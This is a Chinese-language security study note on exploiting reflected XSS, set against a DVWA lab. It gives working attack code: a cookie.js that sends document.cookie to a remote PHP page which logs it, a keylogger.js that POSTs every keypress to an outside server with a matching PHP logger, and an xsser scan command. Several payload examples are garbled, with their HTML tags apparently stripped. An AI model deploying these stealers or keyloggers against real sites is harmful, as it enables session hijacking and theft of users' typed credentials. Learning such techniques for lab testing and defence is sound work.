【安全牛学习笔记】XSS的利用

反射型XSS1.概念

通过社会工程学等手段诱骗用户点击某个精心构造的链接,该链接会将恶意的js代码提交给 有漏洞的服务器网站,并由服务器返回给受害者的客户端执行。

2.POC

-
-
直接通过脚本插入
-type
-
将代码注入到a标签中,点击超链接则执行- -将代码注入到img标签中,加载出错时执行-
-
重定向
- -加载一个宽和高都是0的框架来执行代码- -窃取cookie并发送到指定网址- -修改DOM树中的内容

3.窃取cookiejs代码 cookie.js

varimg=newImage(); img.src="http://1.1.1.1/cookies.php?cookie="+document.cookie;

接收页面代码cookies.php

$c=$_GET['c']; $cookie=fopen("cookie.txt","a"); fwrite($cookie,$c."\r\n\r\n"); fclose($cookie);
echo"success"
?>

恶意代码

 

攻击过程:

当恶意代码被执行时,会从外部网址读取cookie.js在客户端上执行,该js会读取当前页面的 地址并发送到指定的接收页面,由页面接收并保存到文件。

4.keylogger键盘记录js keylogger.js

document.οnkeypress=function(evt){
evt=evt||window.event
key=String.fromCharCode(evt.charCode)
if(key){
varhttp=newXMLHttpRequest();
varparam=encodeURI(key) http.open("POST","http://192.168.20.8/keylogger.php",true); http.setRequestHeader("Content-type","application/x-www-form-urlencoded"); http.send("key="+param);

} }

接收页面 Keylogger.php

$key=$_POST['key']; $logfile="keylog.txt"; $fp=fopen($logfile,"a"); fwrite($fp,$key); fclose($fp);
?>

恶意代码

攻击过程:当恶意代码被执行时,会从外部网址读取keylooger.js在客户端上执行,该js记录所有该页面 上的按键操作并发送到指定的接收页面,由页面接收并保存到文件。

5.xss漏洞检测工具:xsser

xsser-u“http://1.1.1.1/dvwa/vulnerabilities/"-g"xss_r/?name="--cookie="securi ty=low;PHPSESSID=d23e469411707ff8210717e67c521a81"-s-v--reverse-check检测xss漏洞
--heuristic检查被过滤的字符

6.过滤绕过

过滤机制:替换

你可能感兴趣的:(【安全牛学习笔记】XSS的利用)